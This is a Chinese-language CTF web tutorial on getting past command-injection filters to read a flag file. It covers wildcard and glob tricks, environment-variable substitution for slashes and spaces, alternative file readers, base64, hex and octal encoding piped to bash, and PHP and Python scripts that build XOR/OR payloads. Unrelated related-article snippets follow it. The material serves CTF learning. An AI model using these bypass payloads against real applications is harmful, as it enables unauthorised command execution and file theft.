CTF(Web)中关于执行读取文件命令的相关知识与绕过技巧

 在我遇到的题目中,想要读取文件必然是要执行cat /flag这个命令,但是题目当然不会这么轻松。让你直接cat出来,必然会有各种各样的滤过条件,你要做的就是尝试各种方法在cat /flag的基础上进行各种操作构建出最终的payload。

下面我就总结一下一些比较常见的过滤的条件和绕过方式。

(其实过滤条件主要都是对字符的限制,再有就是对长度的限制。)

一.文件名被过滤

我按自己的想法分为两大类

关键词过滤

当过滤不是逐个字母比对时(也就是关键词过滤),我们依然可以使用cat这个命令来操作,因此我们主要是操作“flag”这个字符串,使其不用不用这四个字符也能表示flag这个文件。

因此我们就逐个尝试这几种绕过方法。

1.* 通配文件,在linux里f*可以指代任何以f开头的文件 f*就可以表示flag文件因此我们构建出的payload是 cat /f*,

2.?匹配文件名:可以用?代替滤过字符 f???,就代表任意一个f开头四个字符的文件,自然也可以代表flag,因此

payload是 cat /f???

3.正则匹配: 其实与上述类似,用一个范围代表字符 [9-q]可以匹配早ascll码在9到q之间的字符。

payload是 cat /[9-q][9-q][9-q][9-q]

4.分割文件名,在linux里在字母中间插上‘ “ \这样的字符不会影响,因此可以在其中插入构建payload

其实如果只是关键词过滤的话还挺好绕过的。当然关键词绕过方法,和下面逐个字母比对的绕过有一些方法是重合的,但明显如果只是简单的关键词绕过没有必要搞一些编码什么的。

字符过滤

这个就比较苛刻了,因为题目限制的任何字符都不能出现,比如一般将flag字符进行过滤的也直接把cat给ban了因为cat同样也含有a字符

小ban

ban的字符比较少,凑吧凑吧能构建出payload

1.  / 被过滤:在linux中echo ${PATH}可以输出文件路径在而${PATH:0:1}便取到了/字符,

因此echo ${PATH:0:1}便是代表 /,当然还有很多写法代表/,比如${PATH:4:1}.${PWD:0:1}.${SHELL:0:1}等可以酌情选择

2.空格被过滤同样也可以找代表字符的变量 比如$IFS ${IFS} 或者这样表示{cat,/flag}也可以,我还遇到过一个方法就是使用< 可以这样cat</flag,在前边加<<<也可以表示输入流

3.若是cat的一些字符被ban也可以选择换几个读取命令,下面介绍几个命令

cat(用于连接文件并打印到标准输出设备上)

tac (用于将文件以行为单位反序输出)

more(类似cat命令,会一页一页的显示)我在实战中用到过

less(作用与more类似,都用来浏览文本文件中的内容)

head(可用于查看文件开头部分的内容,后边可选择加以个 -n参数表示显示几行,默认显示10行)

tail(与head类似,但它默认显示后10行)

nl (可以为输出列加上编号)

sed 可以这样构造 sed p /f*

sort(用于将文本文件内容加以排序)

uniq(删除文件中的连续重复行 如果你在不使用任何参数的情况下使用 uniq 命令,它将删除所有连续的重复行,只显示唯一的行)

rev (反转一个或多个文件的行)会把flag倒叙输出

od (od(Octal Dump)命令用于将指定文件内容以八进制、十进制、十六进制、浮点格式或 ASCII 编码字符方式显示,系统默认的显示方式是八进制。)

vim (这俩都是Linux里的文件编辑器,我们在网页直接用system("vim /f*");虽然不会进入编辑模式但还是可以看到里面的内容。)

man(man 命令是 Linux 下的帮助指令,通过 man 指令可以查看 Linux 中的指令帮助、配置文件帮助和编程帮助等信息,类似于vim/vi,直接对文本运行可以看到文本内容。)

paste (使用paste命令可以将每个指定文件里的每一行整合到对应一行里写到标准输出,之间用制表符分隔。)

grep(查找文件里符合条件的字符串)可以这样构造 grep { /f*

file (查看文件信息或类型) file -f /f*

dd (用于读取、转换并输出数据。) 后要加 if=/flag(有点鸡肋,因为f一般会被ban)

大ban

被ban的字符很多,或者只能用几个特定的字符,上述的一些方法就构造不出payload了,这时就要用到较为麻烦的方法了,那就是编码。下面着重介绍几个并附上脚本。(找到合适的编码方式后,还要考虑该方式能不能被识别出来,构造不对就可能被认为是字符串而已)

1.base64编码 echo ’编码后的‘ |base64 -d | bash

2.hex编码 echo ”    “ |xxd -r -p |bash

补充知识:管道符 | 会将前一个命令执行的结果当作第二个命令的输入。

xxd命令:它能将一个给定文件或标准输入转换为十六进制形式,也能将十六进制转换回二进制形式,用法是:xxd /f*

3.oct编码 当你看到白名单中有数字,$  \  ' ' 基本可以确定要用这种编码方式$' ',单引号里加入编码后的内容,空格一般不能被识别,所以可以在空格处断开 $' '<$' '这样就可以了。

下面附上脚本4.异或 同或()

在 PHP 中两个字符串异或之后,得到的还是一个字符串。如果正则匹配过滤了字母和数字,那就可以使用两个不在正则匹配范围内的非字母非数字的字符进行异或,从而得到我们想要的字符串。

或与其原理相同。

下面附上两个脚本

异或

<?php
$myfile = fopen("xor_rce.txt", "w");
$contents="";
for ($i=0; $i < 256; $i++) {
    for ($j=0; $j <256 ; $j++) {

    if($i<16){
        $hex_i='0'.dechex($i);
    }
    else{
        $hex_i=dechex($i);
    }
    if($j<16){
        $hex_j='0'.dechex($j);
    }
    else{
        $hex_j=dechex($j);
    }
    $preg = '/[flag$\/*?;]/';   // 根据题目给的正则表达式修改即可
    if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){
        echo "";
    }
    else{
            $a='%'.$hex_i;
            $b='%'.$hex_j;
            $c=(urldecode($a)^urldecode($b));
            if (ord($c)>=32&&ord($c)<=126) {
                $contents=$contents.$c." ".$a." ".$b."\n";
            }
        }

    }
}
fwrite($myfile,$contents);
fclose($myfile);

注意根据题目过滤要求修改一下正则

执行后会生成一个txt文件,将其粘贴至下一个python脚本文件夹下

# -*- coding: utf-8 -*-

def action(arg):
    s1=""
    s2=""
    for i in arg:
        f=open("xor_rce.txt","r")
        while True:
            t=f.readline()
            if t=="":
                break
            if t[0]==i:
                #print(i)
                s1+=t[2:5]
                s2+=t[6:9]
                break
        f.close()
    output="(\""+s1+"\"^\""+s2+"\")"
    return(output)

while True:
    param=action(input("\n[+] your function:") )+action(input("[+] your command:"))+";"
    print(param)

运行python,在控制板输入你要编码的内容。

或的方式相同,不做赘述,附上php与python脚本

<?php


$myfile = fopen("or_rce.txt", "w");
$contents = "";
for ($i = 0; $i < 256; $i++) {
    for ($j = 0; $j < 256; $j++) {

        if ($i < 16) {
            $hex_i = '0' . dechex($i);
        } else {
            $hex_i = dechex($i);
        }
        if ($j < 16) {
            $hex_j = '0' . dechex($j);
        } else {
            $hex_j = dechex($j);
        }
        $preg = '/[flag$\/*?;]/';    // 根据题目给的正则表达式修改即可
        if (preg_match($preg, hex2bin($hex_i)) || preg_match($preg, hex2bin($hex_j))) {
            echo "";
        } else {
            $a = '%' . $hex_i;
            $b = '%' . $hex_j;
            $c = (urldecode($a) | urldecode($b));
            if (ord($c) >= 32 & ord($c) <= 126) {
                $contents = $contents . $c . " " . $a . " " . $b . "\n";
            }
        }

    }
}
fwrite($myfile, $contents);
fclose($myfile);
# -*- coding: utf-8 -*-

def action(arg):
    s1=""
    s2=""
    for i in arg:
        f=open("or_rce.txt","r")
        while True:
            t=f.readline()
            if t=="":
                break
            if t[0]==i:
                #print(i)
                s1+=t[2:5]
                s2+=t[6:9]
                break
        f.close()
    output="(\""+s1+"\"|\""+s2+"\")"
    return(output)

while True:
    param=action(input("\n[+] your function:") )+action(input("[+] your command:"))+";"
    print(param)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/596566.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

38-1 防火墙了解

一、防火墙的概念: 防火墙(Firewall),也称防护墙,是由Check Point创立者Gil Shwed于1993年发明并引入国际互联网(US5606668 [A]1993-12-15)。它是一种位于内部网络与外部网络之间的网络安全系统,是一项信息安全的防护系统,依照特定的规则,允许或是限制传输的数据通过。…

《QT实用小工具·五十八》模仿VSCode的可任意拖拽的Tab标签组

1、概述 源码放在文章末尾 该项目实现了模仿VSCode的可任意拖拽的Tab标签组&#xff0c;包含如下功能&#xff1a; 拖拽标签页至新窗口 拖拽标签页合并控件 无限嵌套的横纵分割布局&#xff08;类似Qt Creator的编辑框&#xff09; 获取当前使用的标签组、标签页 自动向上合并…

【CTF Reverse】XCTF GFSJ0490 simple-unpack Writeup(UPX壳+脱壳+反汇编)

simple-unpack 菜鸡拿到了一个被加壳的二进制文件 解法 拉进 exeinfope。 检测到是 UPX 打包的 ELF 文件。 NOT Win EXE - .o - ELF [ 64bit obj. Exe file - CPU : AMD x86-64 - OS/ABI: Linux/GNU ]Detected UPX! packer - http://upx.github.io -> try unpack with &…

Linux第三节--常见的指令介绍集合(持续更新中)

点赞关注不迷路&#xff01;&#xff0c;本节涉及初识Linux第三节&#xff0c;主要为常见的几条指令介绍。 如果文章对你有帮助的话 欢迎 评论&#x1f4ac; 点赞&#x1f44d;&#x1f3fb; 收藏 ✨ 加关注&#x1f440; 期待与你共同进步! Linux下基本指令 1. man指令 Linu…

在uniapp里面使用 mp-html 并且开启 latex 功能

在uniapp里面使用 mp-html 并且开启 latex 功能 默认情况下 mp-html 是不会开启 latex 功能的, 如果需要开启 latex 功能是需要到代码操作拉取代码自行打包的。 这里说一下 mp-html 里面的 latex 功能是由 https://github.com/rojer95/katex-mini 提供的技术实现&#xff0c;…

科技园3d数据可视化展示

我们的园区安防3D可视化报警平台通过高精度三维建模技术&#xff0c;将管理对象场景以立体、直观的方式呈现&#xff0c;实现管理对象的全面可视化。同时&#xff0c;平台与各类业务系统深度对接&#xff0c;实现数据、告警、远程操作的整合展示和联动响应&#xff0c;构建中心…

Java基础教程 - 4 流程控制

更好的阅读体验&#xff1a;点这里 &#xff08; www.doubibiji.com &#xff09; 更好的阅读体验&#xff1a;点这里 &#xff08; www.doubibiji.com &#xff09; 更好的阅读体验&#xff1a;点这里 &#xff08; www.doubibiji.com &#xff09; 4 流程控制 4.1 分支结构…

CSS Web服务器、2D、动画和3D转换

Web服务器 我们自己写的网站只能自己访问浏览&#xff0c;但是如果想让其他人也浏览&#xff0c;可以将它放到服务器上。 什么是Web服务器 服务器(我们也会称之为主机)是提供计算服务的设备&#xff0c;它也是一台计算机。在网络环境下&#xff0c;根据服务器提供的服务类型不…

C++构造函数和析构函数的调用顺序

一般情况下&#xff0c;调用析构函数的次序正好与调用构造函数的次序相反&#xff0c;也就是最先被调用的构造函数&#xff0c;其对应的析构函数最后被调用&#xff0c;而最后被调用的构造函数&#xff0c;其对应的析构函数最先被调用。 当然对象的构造函数和析构函数调用时机和…

DRF的序列化【2】

【0】前提概要 【1】基于 View JsonResponse 编写的 5 个接口&#xff1a; 序列化自定义处理: 你需要自己编写序列化逻辑。处理 JSON 格式的 POST 请求数据: 从 request.body 中获取数据&#xff0c;并使用 json.loads() 解析成字典&#xff0c;然后创建相应的对象。request.…

JS基础:变量的详解

你好&#xff0c;我是云桃桃。 一个希望帮助更多朋友快速入门 WEB 前端的程序媛。 云桃桃&#xff0c;大专生&#xff0c;一枚程序媛&#xff0c;感谢关注。回复 “前端基础题”&#xff0c;可免费获得前端基础 100 题汇总&#xff0c;回复 “前端基础路线”&#xff0c;可获取…

基于51单片机NEC协议红外遥控发送接收proteus仿真设计

1.主要功能&#xff1a; 设计一个51单片机红外遥控发射接收proteus仿真设计 功能要求&#xff1a; 1、使用单片机模拟红外遥控器发射红外编码&#xff1b; 2、利用从机接收红外编码&#xff0c;并将编码以16进制显示到数码管上。 需注意仿真中51单片机芯片是兼容的&#x…

Web网页项目实战-----小兔鲜儿项目

本网站是一个电商网站&#xff0c;主要由Html、CSS、JS来完成&#xff0c;实现的功能主要是可以购买产品&#xff0c;展示产品&#xff0c;查看订单等功能&#xff0c;效果如下&#xff0c;如有需要项目代码的可以私信我&#xff0c;或者文章底下评论&#xff0c;我给分享原项目…

爬虫学习(2)破解百度翻译

代码 import requests import jsonif __name__ "__main__":url https://fanyi.baidu.com/sug#post请求参数处理&#xff08;同get请求一致&#xff09;headers {"User-Agent": Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, …

【C语言】第一个C程序:hello world

printf简介 printf是C语言提供的库函数&#xff0c;可以在屏幕上打印格式化数据。这里不作展开&#xff0c;只需要知道&#xff0c;如果要打印hello world&#xff0c;就把双引号引起来的"hello world"作为参数传给printf就行了。如果想要在打印后换行&#xff0c;要…

【Linux】冯·诺依曼体系结构

要想谈进程&#xff0c;我们就不能只谈进程&#xff0c;我们如果想搞清楚什么是进程&#xff0c;就要从操作系统讲起。我们现在的不管是Linux或是Windows或是安卓等操作系统&#xff0c;它们都有一个相同点&#xff0c;那就是遵循冯诺依曼体系结构&#xff0c;我们看一下冯诺依…

如何让你的排单更快?

一般我们都喜欢做打板借用快速通道&#xff01;但是目前快速通道也是共享通道&#xff0c;独立单元格基本不开发。 想要排单更快&#xff0c;想要隔夜打板&#xff0c;我们到底应该怎么做呢&#xff1f; 想要排单更快&#xff0c;说白了就是要提高你的交易速度&#xff01;一&a…

ai写作工具推荐:如何用AI人工智能进行写作

AI写作工具&#xff1a;提升创作效率的秘密武器 在科技日新月异的今天&#xff0c;人工智能&#xff08;AI&#xff09;已经渗透到我们生活的方方面面&#xff0c;包括写作。AI写作工具&#xff0c;就是利用人工智能技术&#xff0c;帮助我们进行文本生成、语言优化等工作的工…

使用C语言实现杨氏矩阵并找出数字

前言 过了五一假期&#xff0c;咋们经过了一个假期的休息&#xff0c;要继续学习了&#xff0c;不能偷懒哦&#xff01;&#xff01; 今天让我们来看看如何在一个杨氏矩阵中找出自己想找到的数字。 首先&#xff0c;我们要了解一下杨氏矩阵到底是什么&#xff0c;如果一个矩阵中…

语音识别简介

⚠申明&#xff1a; 未经许可&#xff0c;禁止以任何形式转载&#xff0c;若要引用&#xff0c;请标注链接地址。 全文共计3077字&#xff0c;阅读大概需要3分钟 &#x1f308;更多学习内容&#xff0c; 欢迎&#x1f44f;关注&#x1f440;【文末】我的个人微信公众号&#xf…